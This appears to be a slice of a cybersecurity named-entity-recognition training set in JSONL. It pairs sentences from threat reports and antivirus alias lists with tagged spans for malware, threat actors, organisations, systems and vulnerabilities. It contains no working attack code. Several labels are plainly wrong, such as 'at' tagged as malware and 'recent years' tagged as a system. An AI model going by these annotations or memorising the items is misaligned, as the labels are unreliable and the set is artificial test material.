{"text": "A week later, an anonymous user, supposedly the author of AES-NI ransomware the XData is based on, released the master private key.", "spans": {"ORGANIZATION: anonymous user,": [[17, 32]], "THREAT_ACTOR: author": [[48, 54]], "MALWARE: AES-NI ransomware": [[58, 75]], "MALWARE: XData": [[80, 85]]}, "info": {"id": "cyner2_train_005194", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod8cd.Trojan.9e70 Backdoor/W32.BlackAngel.780304 W32/Backdoor.AAVE-7405 Backdoor.Trojan BKDR_BLAKANGEL.A Backdoor.Win32.BlackAngel.05 Trojan.Win32.BlackAngel.hiov Backdoor.Win32.BlackAngel.780304 Backdoor.W32.BlackAngel.05!c Backdoor.Win32.BlackAngel.05 BackDoor.BlackAngel.5 Backdoor.BlackAngel.Win32.6 BKDR_BLAKANGEL.A BehavesLike.Win32.PWSZbot.bc W32/Backdoor.DMA Backdoor/BlackAngel.05 BDS/BlackAngel.05 W32/BlackAn.05!tr.bdr Trojan[Backdoor]/Win32.BlackAngel Backdoor.Win32.BlackAngel.05 Backdoor:Win32/BlackAngel.0_5 Backdoor.BlackAngel Win32/BlackAngel.05 Win32.Backdoor.Blackangel.Lndw Backdoor.Win32.BlackAngel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005195", "source": "cyner2_train"}}
{"text": "Since late November 2016, the Shamoon 2 attack campaign has brought three waves of destructive attacks to organizations within Saudi Arabia.", "spans": {"THREAT_ACTOR: campaign": [[47, 55]], "ORGANIZATION: organizations": [[106, 119]]}, "info": {"id": "cyner2_train_005196", "source": "cyner2_train"}}
{"text": "Only this time, it's a Hangul Word Processor HWP document leveraging the already known CVE-2015-2545 Encapsulated PostScript EPS vulnerability.", "spans": {"VULNERABILITY: Encapsulated PostScript EPS vulnerability.": [[101, 143]]}, "info": {"id": "cyner2_train_005198", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Sacto.e Trojan.Graftor.D1DEE6 BKDR_SACTO.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9983 Backdoor.Trojan BKDR_SACTO.SM0 TrojWare.Win32.Sacto.A Trojan.PWS.Multi.1194 Backdoor:Win32/Sacto.A!dha W32/Sacto.E!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005199", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Exploit.Java.CVE20120507.cqxpdq Java/Downloader.BM Exp.CVE-2015-2590 JAVA_DLOADR.EFD Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Java.Downloader.1103 JAVA_DLOADR.EFD BehavesLike.Java.Downloader.zj Java/Downloader.BM Java.Exploit.CVE-2015-2590.A TrojanDownloader:Java/Reamshunt.A Java.Exploit.CVE-2015-2590.A Java.Exploit.CVE-2015-2590.A Exploit.Java_c.QQT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005200", "source": "cyner2_train"}}
{"text": "For the past several weeks, Forcepoint Security Labs have been tracking a seemingly low-profile piece of malware which piqued our interest for a number of reasons: few samples appear to be available in the wild; there is no previous documentation referring to the C2 domains and IP addresses it uses despite the domains appearing to be at least twelve months old; and, if its compilation timestamps are to be trusted, the campaign itself may have been active for at least six months before samples started to surface...", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[28, 52]], "MALWARE: malware": [[105, 112]], "THREAT_ACTOR: campaign": [[422, 430]]}, "info": {"id": "cyner2_train_005201", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.DDur.Win32.4 Trojan/DDur.n Win32.Trojan.WisdomEyes.16070401.9500.9937 Trojan.Zlob Win.Trojan.Dnschanger-1136 Trojan.Win32.DDur.xjyd Trojan.Win32.Z.Ddur.16289 Trojan.Packed.253 BehavesLike.Win32.Vundo.lc Trojan.Win32.DNSChanger Win32.Troj.DNSChangerT.kg.14848 Trojan:Win32/Remetrac.C Trojan/Win32.Monder.C72152 BScope.Trojan.Sawbones.vf Win32/Trojan.e0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005203", "source": "cyner2_train"}}
{"text": "A group known as the Cutting Sword of Justice took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack back in 2012, and justified the attack as a measure against the Saudi monarchy.", "spans": {"THREAT_ACTOR: group": [[2, 7]], "THREAT_ACTOR: the Cutting Sword of Justice": [[17, 45]], "ORGANIZATION: the Saudi Aramco": [[62, 78]], "ORGANIZATION: Pastebin message": [[99, 115]]}, "info": {"id": "cyner2_train_005205", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Murlo.FK Downloader.Murlo.Win32.1632 Trojan/Downloader.Murlo.fk Trojan.Downloader.Murlo.FK Trojan.DL.Murlo!u+ZN6N7ySiY W32/Downldr2.HWY Trojan.Downloader-8985 Trojan-Downloader.Win32.Murlo.fk Trojan.Win32.Murlo.kadq Trojan.Win32.Downloader.2560.J[h] NORMAL:Trojan.DL.Win32.Murlo.c!1185532 Trojan.Downloader.Murlo.FK TrojWare.Win32.TrojanDownloader.Murlo.FK Trojan.Downloader.Murlo.FK Trojan.DownLoader.26702 BehavesLike.Win32.Mamianune.xh TrojanDownloader.Murlo.ar Trojan[Downloader]/Win32.Murlo Win32.TrojDownloader.Murlo.fk.kcloud Win-Trojan/Murlo.2560.J Trojan.Downloader.Murlo.FK Win32/TrojanDownloader.Murlo.FK Trojan-Downloader.Win32.Tiny.hn Win32/Ngvck.BP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005207", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9818 Riskware.Win32.FileTour.ednjdc Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005209", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.EA17 Trojan.Tibs.BJ Worm/W32.Nuwar.31364 I-Worm.Zhelatin.eo.n1 Worm.Zhelatin.Win32.1360 W32/Zhelatin.eo Trojan.Tibs.BJ W32/EmailWorm.KUL Trojan.Packed.13 Trojan.Small-2710 Email-Worm.Win32.Zhelatin.eo Trojan.Win32.Zhelatin.chkpnw I-Worm.Win32.Zhelatin.31364[h] PE:Worm.Mail.Win32.Zhelatin.eu!1074243991 Trojan.Tibs.BJ Email-Worm.Win32.Zhelatin.eo Trojan.Tibs.BJ Trojan.Packed.140 Trojan.Vxgame.z TROJ_FORUCON.BMC W32/Worm.YFRS-1205 I-Worm/Zhelatin.cna W32/Tibs.EO@mm Worm[Email]/Win32.Zhelatin Worm.Zhelatin.eo.kcloud Trojan.Tibs.BJ Spammer:Win32/Clodpuntor.A Virus.Win32.Heur.d Trojan.Tibs.BJ Trojan.Vxgame.z Trojan-Downloader.Revelation.Tibs.B Worm.Win32.Zhelatin.Az Win32.Worm-email.Zhelatin.Hwwo Packer.Win32.Tibs Trojan.Tibs.BJ Downloader.Tibs.5.BO Trj/Spammer.ABX Win32/Trojan.be3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005211", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameELXIAUS.Trojan Trojan.Win32.Buzy!O Backdoor.Tenrite.A4 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_TENRITE_0000000.TOMA Trojan.Win32.Tens.as Trojan.Win32.Buzy.ikstz Trojan.Win32.A.Tens.13312 TrojWare.Win32.Tenrite.A Trojan.Click2.12702 BehavesLike.Win32.BadFile.lz Trojan.Win32.Tenrite TR/Buzy.3083.1 Trojan/Win32.Tens Trojan.Buzy.DC0B Trojan.Win32.Tens.as Backdoor:Win32/Tenrite.A Win32/Tenrite.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005212", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.BrowseFox.Win32.220089 Trojan.Razy.D2BA2D Win32.Trojan.WisdomEyes.16070401.9500.9546 Win.Trojan.Server-24 Riskware.Win32.Server.ctchyk Program.Server.260 BehavesLike.Win32.HLLP.fz SPR/SmallHTTP.F GrayWare[Server-Web]/Win32.SmallHTTP Riskware.SmallHTTP! not-a-virus:Server-Web.Win32.SmallHTTP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005213", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/OnLineGames.pmt Trojan.Win32.OnLineGames.djktr W32.Gammima.AG Win32/Pebox.Y Trojan-GameThief.Win32.OnLineGames.ajibj Trojan.PWS.OnLineGames!PDfLLBwapmw Trojan.PWS.Wsgame.37257 TR/PSW.OnlineGames.xbkj Trojan/PSW.OnLineGames.bylz PWS:Win32/DNFOnline.A Malware.Gammima!rem Win32/PSW.OnLineGames.PMT Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.AJIBJ!tr PSW.OnlineGames3.ATWL Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005215", "source": "cyner2_train"}}
{"text": "The Nyetya attack was a destructive ransomware variant that affected many organizations inside of Ukraine and multinational corporations with operations in Ukraine.", "spans": {"MALWARE: ransomware variant": [[36, 54]], "ORGANIZATION: organizations": [[74, 87]], "ORGANIZATION: multinational corporations": [[110, 136]]}, "info": {"id": "cyner2_train_005216", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Pincav!O Trojan/Pincav.awm Win.Trojan.Pincav-604 Trojan.Win32.Pincav.awn Trojan.Win32.Pincav.drkdnm Trojan.Win32.A.Pincav.1185236 Troj.Clicker.W32.Small.kZ0E Trojan.Pincav.Win32.12742 Trojan/Pincav.chh Trojan/Win32.Pincav Trojan.Graftor.D836A Trojan.Win32.Pincav.awn Backdoor:Win32/Losfondup.A Trojan/Win32.Pincav.R42635 TScope.Trojan.Delf Backdoor.Losfondup!Ng6K/s6DvsI Trojan-PWS.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005217", "source": "cyner2_train"}}
{"text": "Although the use of free web-services as a C2 channel is not new, the use of a Github issue for a command/response channel was interesting.", "spans": {"SYSTEM: Github issue": [[79, 91]], "ORGANIZATION: channel": [[115, 122]]}, "info": {"id": "cyner2_train_005219", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WinwebA.Trojan TrojanDropper.Henbang.A6 Win32.Worm.AutoRun.c W32/Adware.PXAH-3010 W32.Virut.CF Win32/SillyBHO.OL Worm.Win32.AutoRun.ibh Trojan.Win32.AutoRun.cqpmwl Trojan.MulDrop.32523 BehavesLike.Win32.AdwareBetterSurf.gh W32/Adware.ACXN Win32.Virut.cr.61440 TrojanDropper:Win32/Henbang.A Worm.Win32.AutoRun.ibh Win32.Trojan.Webdat.A Worm/Win32.AutoRun.R56346 Backdoor.WinNT.PcClient Win32/Worm.FakeFolder.FF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005220", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RansomwareTQB.Trojan Trojan.ServStart.A Troj.W32.StartServ.tnEy Trojan/ServStart.io Win32.Trojan.ServStart.aj Backdoor.Trojan TROJ_SERVSTART_GJ1000AC.UVPN Trojan.Win32.StartServ.xer Trojan.Win32.Heuristic131.dcnfpc Trojan.Win32.Z.Servstart.196709.QO TrojWare.Win32.ServStart.CA Trojan.Mrblack.3 Trojan.StartServ.Win32.135 TROJ_SERVSTART_GJ1000AC.UVPN Trojan.Win32.ServStart Trojan.Zusy.D23C29 Trojan.Win32.StartServ.xer Backdoor/Win32.Zegost.R117606 Trojan.StartServ Win32/ServStart.IO Win32.Trojan.Startserv.Huzb Win32/Trojan.a35", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005222", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Society.A W32/Society.DR Win32.Trojan.WisdomEyes.16070401.9500.9997 W95.Sosume.3363 PE_ALCAUL.H Win.Trojan.Alcaul-8 Virus.Win32.Alcaul.h Win32.Society.A Virus.Win32.Alcaul.ue W32.Alcaul.h!c Win32.Society.A Virus.Win32.Alcaul.h Win32.Society.A Win95.Necromancer.3363 PE_ALCAUL.H BehavesLike.Win32.Mental.xz W32/Risk.GISN-1213 Win32/Alcaul.h W32/Alcaul.H W32/Alcaul.H!tr.dr Virus/Win32.Alcaul Win32.Society.A Backdoor:Win32/Society.A Virus.Win9x.Repus Win32.Society.A W32/Alcal.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005224", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Dapato!O TrojanClicker.Baffec.A10 Trojan.Downloader Downloader.Dapato.Win32.1470 Trojan/Downloader.Dapato.fxd Win32.Trojan.WisdomEyes.16070401.9500.9610 TROJ_DAPATO_CA08278A.TOMC Trojan-Downloader.Win32.Dapato.fxd Trojan.Win32.Dapato.bxnvih Trojan.Downloader-Dapato Win32.Trojan-downloader.Dapato.Srdc TrojWare.Win32.Downloader.Dapato.FXD Trojan.DownLoad3.2529 TROJ_DAPATO_CA08278A.TOMC Trojan-Downloader.Win32.Dapato TrojanDownloader.Dapato.atd Trojan[Downloader]/Win32.Dapato TrojanClicker:Win32/Baffec.A Trojan.Delf.28 Trojan-Downloader.Win32.Dapato.fxd Downloader/Win32.Dapato.R22620 TrojanDownloader.Dapato Trojan.DL.Dapato!K0jxx5EHs9Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005226", "source": "cyner2_train"}}
{"text": "Ongoing reporting by ClearSky", "spans": {}, "info": {"id": "cyner2_train_005227", "source": "cyner2_train"}}
{"text": "The users of this app include many well known celebrities who eventually post the dubbed videos on popular social networking platforms like Facebook and Twitter.", "spans": {"ORGANIZATION: Facebook": [[140, 148]], "ORGANIZATION: Twitter.": [[153, 161]]}, "info": {"id": "cyner2_train_005228", "source": "cyner2_train"}}
{"text": "Social networking sites Facebook and Twitter are primarily being used to spread a shortened URL using bit.ly service that points to a Google Cloud Server hosting the malicious payload with .COM or .EXE file extensions.", "spans": {"ORGANIZATION: Facebook": [[24, 32]], "ORGANIZATION: Twitter": [[37, 44]], "SYSTEM: Google Cloud Server hosting": [[134, 161]]}, "info": {"id": "cyner2_train_005231", "source": "cyner2_train"}}
{"text": "This report documents some of our recent findings regarding its cryptography, network behavior,and banking targets.", "spans": {"THREAT_ACTOR: cryptography, network behavior,and": [[64, 98]], "ORGANIZATION: banking targets.": [[99, 115]]}, "info": {"id": "cyner2_train_005232", "source": "cyner2_train"}}
{"text": "Earlier this year, the SpiderLabs team at Trustwave investigated a series of bank breaches originating from postSovietstates.", "spans": {"ORGANIZATION: the SpiderLabs team": [[19, 38]], "MALWARE: at": [[39, 41]], "ORGANIZATION: Trustwave": [[42, 51]]}, "info": {"id": "cyner2_train_005233", "source": "cyner2_train"}}
{"text": "This banking malware can steal login credentials from 94 different mobile banking apps.", "spans": {"MALWARE: This banking malware": [[0, 20]], "SYSTEM: mobile banking apps.": [[67, 87]]}, "info": {"id": "cyner2_train_005235", "source": "cyner2_train"}}
{"text": "In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms.", "spans": {"THREAT_ACTOR: campaign, FIN7": [[22, 36]]}, "info": {"id": "cyner2_train_005236", "source": "cyner2_train"}}
{"text": "We also discovered two previously unknown payloads.These payloads contained backdoors that we have named BYEBY and PYLOT respectively.", "spans": {"MALWARE: unknown payloads.These payloads": [[34, 65]], "MALWARE: backdoors": [[76, 85]], "MALWARE: BYEBY": [[105, 110]], "MALWARE: PYLOT": [[115, 120]]}, "info": {"id": "cyner2_train_005237", "source": "cyner2_train"}}
{"text": "Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia.", "spans": {}, "info": {"id": "cyner2_train_005242", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrjnDwnldrMSIL.Ranos.A4 MSIL.Trojan.Injector.q BKDR_RANOS.SM TrojWare.MSIL.TrojanDownloader.Small.DS Trojan.Starter.2890 BKDR_RANOS.SM Trojan.Jintor.1 TrojanDownloader:MSIL/Ranos.A Trojan.Win32.Fsysna MSIL/Injector.CKC!tr Trj/GdSda.A Win32/Trojan.e2d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005243", "source": "cyner2_train"}}
{"text": "Some of the tactics used in APT attacks die hard.", "spans": {"THREAT_ACTOR: APT attacks": [[28, 39]]}, "info": {"id": "cyner2_train_005245", "source": "cyner2_train"}}
{"text": "How does Gooligan work ? The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device .", "spans": {"MALWARE: Gooligan": [[9, 17]], "MALWARE: Gooligan-infected": [[83, 100]]}, "info": {"id": "cyner2_train_005248", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9931 W32/Trojan.MNLT-0240 TR/Crypt.Xpack.rxrlk Trojan.Symmi.D136A2 Win32/Trojan.859", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005250", "source": "cyner2_train"}}
{"text": "This new process downloads and executes the final stage: a Remote Administration Tool RAT based on Gh0st RAT.", "spans": {"MALWARE: a Remote Administration Tool RAT": [[57, 89]], "MALWARE: Gh0st RAT.": [[99, 109]]}, "info": {"id": "cyner2_train_005251", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy.Win32.TravNet.vmq Trojan.PWS.Spy.17858 Trojan.Win32.Webprefix Trojan.Zusy.D124FE Trojan-Spy.Win32.TravNet.vmq TrojanDownloader:Win32/Travnet.B Trojan/Win32.Travnet.R99919 Trojan.Farfli!4lB/nc8HSss W32/Farfli.LI TrojanSpy.TravNet Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005254", "source": "cyner2_train"}}
{"text": "The oldest sample we found was created in 2009, indicating this tool has been in use for almost seven years.", "spans": {"MALWARE: tool": [[64, 68]]}, "info": {"id": "cyner2_train_005255", "source": "cyner2_train"}}
{"text": "Earlier this year, we talked about how cybercriminals took advantage of the popularity of Pokemon Go to launch their own malicious apps.", "spans": {"SYSTEM: Pokemon Go": [[90, 100]], "MALWARE: own malicious apps.": [[117, 136]]}, "info": {"id": "cyner2_train_005257", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Krypt.drmwlo BehavesLike.Win32.Backdoor.gh TR/Krypt.503296 Trojan.MSIL.Bladabindi.1 Trj/CI.A Trojan.VB.Inject MSIL/Bbindi.W!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005258", "source": "cyner2_train"}}
{"text": "Mozilla products that don't contain the PDF Viewer, such as Firefox for Android, are not vulnerable.", "spans": {"ORGANIZATION: Mozilla": [[0, 7]], "SYSTEM: Firefox for Android,": [[60, 80]], "VULNERABILITY: vulnerable.": [[89, 100]]}, "info": {"id": "cyner2_train_005259", "source": "cyner2_train"}}
{"text": "we are currently working with Adobe to confirm the CVE number for this exploit", "spans": {"ORGANIZATION: Adobe": [[30, 35]], "VULNERABILITY: CVE number": [[51, 61]], "MALWARE: exploit": [[71, 78]]}, "info": {"id": "cyner2_train_005260", "source": "cyner2_train"}}
{"text": "The malware likely required a significant amount of time and knowledge to create.", "spans": {}, "info": {"id": "cyner2_train_005261", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crack2000.Win32.1 Trojan/.hack Win.Trojan.HackDream-1 Trojan.IRC.Hack Trojan.Win32.Hack.fvvy TrojWare.IRC.Hack.A Trojan.IrcHack BehavesLike.Win32.Dropper.tc Trojan/IRC.Hack JS/IRC.bdmlu Trojan/IRC.Hack Trojan.Win32.IRCHack.546218 Trojan.IRC.Hack Trojan.2000Cracks IRC/Hack.A IRC/Hack.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005262", "source": "cyner2_train"}}
{"text": "The addition of DNS-based exfiltration is new for this malware family; however, other POS malware families such as BernhardPOS and FrameworkPOS have used this technique in the past.", "spans": {"VULNERABILITY: DNS-based exfiltration": [[16, 38]], "MALWARE: malware family;": [[55, 70]], "MALWARE: POS malware families": [[86, 106]], "MALWARE: BernhardPOS": [[115, 126]], "MALWARE: FrameworkPOS": [[131, 143]]}, "info": {"id": "cyner2_train_005263", "source": "cyner2_train"}}
{"text": "How does the malware work without code for these key components ? As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run .", "spans": {}, "info": {"id": "cyner2_train_005264", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.OnLineGames.Win32.215966 Trojan.Heur.RP.cmIfaG!Q79i TSPY_ONLINEG.TGV Win32.Trojan.WisdomEyes.16070401.9500.9941 Win32/Zuten.DK TSPY_ONLINEG.TGV Trojan-GameThief.Win32.OnLineGames.afmb Trojan.Win32.OnLineGames.cvmqrs Troj.GameThief.W32.OnLineGames.afmb!c TrojWare.Win32.Magania.~D Trojan.PWS.Gamania.9849 BehavesLike.Win32.Sytro.nc Virus.Win32.Onlinegames.BBH TrojanDownloader.Small.unq Trojan[GameThief]/Win32.OnLineGames Trojan:Win32/Hookja.A Trojan-GameThief.Win32.OnLineGames.afmb Trojan/Win32.OnlineGameHack.R70066 Trojan.Win32.OnlineGames.10068 Win32.Trojan-gamethief.Onlinegames.Wvkq W32/Onlinegames.KKW!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005266", "source": "cyner2_train"}}
{"text": "One of the most profitable cyber crimes in recent years is ATM robbery, where the cyber criminals extract cash directly from automated teller machines that have already been infected with malware, causing millions of dollars in loss for the banks worldwide.", "spans": {"THREAT_ACTOR: cyber crimes": [[27, 39]], "SYSTEM: recent years": [[43, 55]], "SYSTEM: ATM": [[59, 62]], "THREAT_ACTOR: cyber criminals": [[82, 97]], "SYSTEM: automated teller machines": [[125, 150]], "MALWARE: malware,": [[188, 196]], "ORGANIZATION: banks": [[241, 246]]}, "info": {"id": "cyner2_train_005268", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransome.Crowti.OB4 Tool.Patcher.Win32.14244 Trojan/Filecoder.CryptoWall.d Win32.Trojan.Filecoder.h Ransom.Cryptodefense Ransom_HPCRYPTESLA.SM2 Trojan.Win32.Encoder.dytusk Trojan.Encoder.514 Win32.Malware!Drop Ransom_HPCRYPTESLA.SM2 Variant.Symmi.bop TR/AD.Crowti.Y.580 Packed.Win32.Tpyn Win32.Trojan-Ransom.TeslaCrypt.N Win-Trojan/Inject.249861 Win32.Malware!Drop Win32/Filecoder.CryptoWall.D Trojan.Filecoder!cG6QHMIV+ig Trojan.Win32.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005269", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.DLBoost.A4 Win32.Trojan.WisdomEyes.16070401.9500.9658 Exploit.Win32.Simadona.b Exploit.Win32.Simadona.eqnhht Trojan.RoboInstall.6 BehavesLike.Win32.Backdoor.wc Trojan.Win32.HackTool HackTool:Win32/Skipun.A!bit Exploit.Win32.Simadona.b PUP/Win32.DLBoost.C1760189 Win32/Trojan.Exploit.09b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005270", "source": "cyner2_train"}}
{"text": "Over the course of the last year, ESET has detected and analyzed several instances of malware used for targeted espionage – dubbed SBDH toolkit.", "spans": {"ORGANIZATION: ESET": [[34, 38]], "MALWARE: malware": [[86, 93]], "THREAT_ACTOR: targeted espionage": [[103, 121]], "MALWARE: dubbed SBDH toolkit.": [[124, 144]]}, "info": {"id": "cyner2_train_005271", "source": "cyner2_train"}}
{"text": "This article discusses a group of PlugX samples which we believe are all used by the same attackers, and the measures they have taken to attempt to bypass security mechanisms.", "spans": {"MALWARE: PlugX": [[34, 39]], "THREAT_ACTOR: the same attackers,": [[81, 100]]}, "info": {"id": "cyner2_train_005273", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Obfuscated.en!O Trojan.Obfuscated.Win32.70479 Troj.W32.Obfuscated.tpfc Trojan/Obfuscated.a1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Adware.Lop Win.Trojan.Obfus-22 Trojan.Win32.Obfuscated.en Virus.Win32.Sality.bgiylc Trojan.Win32.Obfuscated.3771904 TrojWare.Win32.Obfuscated.en Trojan.Packed.149 BehavesLike.Win32.Dropper.jh Trojan-Downloader.Win32.Swizzor Trojan/Win32.Obfuscated Win32.Troj.ObfuscatedT.cz.545792 Trojan:Win32/C2Lop.C Adware.Lop-Variant Trojan.Win32.Obfuscated.en MalwareScope.Trojan-Downloader.Obfuscated.2 Win32/Obfuscated.A1 W32/Swizzor.B!tr Win32/Trojan.Obfus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005274", "source": "cyner2_train"}}
{"text": "We are uncertain of its objectives but estimate it is criminally motivated.", "spans": {}, "info": {"id": "cyner2_train_005277", "source": "cyner2_train"}}
{"text": "These attacks are themed around Middle Eastern political issues and the motivation appears to relate to espionage, as opposed to opportunistic or criminal intentions.", "spans": {"THREAT_ACTOR: espionage,": [[104, 114]]}, "info": {"id": "cyner2_train_005279", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-CUR.svr Win32.Backdoor.Detarmal.b Backdoor.Trojan Backdoor.Win32.Delf.NBJ BackDoor.Cae.7 BehavesLike.Win32.Upatre.qh Backdoor:Win32/Detarmal.A Win32/Delf.NBJ W32/Detarmal.A!tr Bck/Furaxdoor.B Backdoor.Win32.Detarmal.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005280", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_GE.71380BE1 Trojan.Java.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005281", "source": "cyner2_train"}}
{"text": "However in this campaign, the binary payload, which was later found to be a NanoCore RAT client, is actually embedded in the obfuscated HTA.", "spans": {"THREAT_ACTOR: campaign,": [[16, 25]], "MALWARE: the binary payload,": [[26, 45]], "MALWARE: a NanoCore RAT client,": [[74, 96]]}, "info": {"id": "cyner2_train_005282", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.5B76 Trojan.Win32.Yakes.vpjr Trojan.Fakealert.49835 BehavesLike.Win32.PUPXAX.gc W32/Trojan.TMDY-2947 TR/Crypt.ZPACK.mnboo Trojan.Razy.D13B86 Trojan.Win32.Yakes.vpjr W32/Kryptik.EZWB!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005284", "source": "cyner2_train"}}
{"text": "LeakerLocker claims to have made an unauthorized backup of a phone's sensitive information that could be leaked to a user's contacts unless it receives a modest ransom.", "spans": {"MALWARE: LeakerLocker": [[0, 12]]}, "info": {"id": "cyner2_train_005285", "source": "cyner2_train"}}
{"text": "We have made the connection to Bitter APT through tactics, techniques, and procedures TTPs that have been observed in other publications, such as the use of Microsoft Office exploits through Excel files, and the use of CHM and Windows Installer MSI files.", "spans": {"THREAT_ACTOR: Bitter APT": [[31, 41]], "MALWARE: Microsoft Office exploits": [[157, 182]], "SYSTEM: CHM": [[219, 222]], "SYSTEM: Windows Installer MSI": [[227, 248]]}, "info": {"id": "cyner2_train_005286", "source": "cyner2_train"}}
{"text": "Pawn Storm is an active cyber espionage actor group that has been very aggressive and ambitious in recent years.", "spans": {"THREAT_ACTOR: Pawn Storm": [[0, 10]], "THREAT_ACTOR: cyber espionage actor group": [[24, 51]]}, "info": {"id": "cyner2_train_005289", "source": "cyner2_train"}}
{"text": "Telegram using IP address from Spain.", "spans": {"SYSTEM: Telegram": [[0, 8]]}, "info": {"id": "cyner2_train_005290", "source": "cyner2_train"}}
{"text": "Today RSA is reporting GlassRAT, a previously undetectable Remote Access Tool RAT which was discovered by the RSA Incident Response Team and investigated by RSA Research during an engagement with a multi-national enterprise.", "spans": {"ORGANIZATION: RSA": [[6, 9]], "MALWARE: GlassRAT,": [[23, 32]], "MALWARE: Remote Access Tool RAT": [[59, 81]], "ORGANIZATION: RSA Incident Response Team": [[110, 136]], "ORGANIZATION: RSA Research": [[157, 169]], "ORGANIZATION: multi-national enterprise.": [[198, 224]]}, "info": {"id": "cyner2_train_005292", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Nanspy Worm.Nanspy.Win32.9 Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Nanspy.TXTE-7172 W32.Kassbot.B Win.Worm.Nanspy-1 Net-Worm.Win32.Nanspy.e Trojan.Win32.Nanspy.fwie W32.W.Bagle.kZt7 Heur.Packed.MultiPacked BackDoor.Pyev BehavesLike.Win32.HLLPPhilis.nc Trojan-Dropper.Delf W32/Nanspy.O I-Worm/Nanspy.d WORM/Nanspy.E Backdoor:Win32/Nanspy.D Worm.Win32.Net-Nanspy.34368.B Trojan/Win32.Lydra.R96925 Net-Worm.Win32.Nanspy.e Worm.Nanspy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005293", "source": "cyner2_train"}}
